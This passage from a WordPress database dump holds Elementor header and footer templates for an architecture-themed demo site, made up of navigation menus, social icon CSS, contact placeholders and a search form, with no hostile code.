03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?page_id=42',0,'page','',0),(51,1,'2022-06-07 07:05:50','2022-06-07 07:05:50','<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/ZVfpkGDfAhHGSeGJ6\">30 Commercial Road Fratton, Australia</a>								</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					Mon - Sat: 8.00 am - 7.00 pm																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 2','','publish','closed','closed','','header-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&#038;p=51',0,'ova_framework_hf_el','',0),(78,1,'2022-06-07 07:25:33','2022-06-07 07:25:33','Call anytime						\n					<ul>\n								<li>\n																					<a href=\"tel:+23425446680 \">\n													+23 425 4466 80												</a>\n																			</li>\n											</ul>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							Send email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 3','','publish','closed','closed','','header-3','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&#038;p=78',0,'ova_framework_hf_el','',0),(103,1,'2022-06-07 07:56:32','2022-06-07 07:56:32','<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Le\'t turn your ideas into reality</h2>		\n		[mc4wp_form id=\"107\"]		\n					<ul>\n								<li>\n																					<a href=\"tel:021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7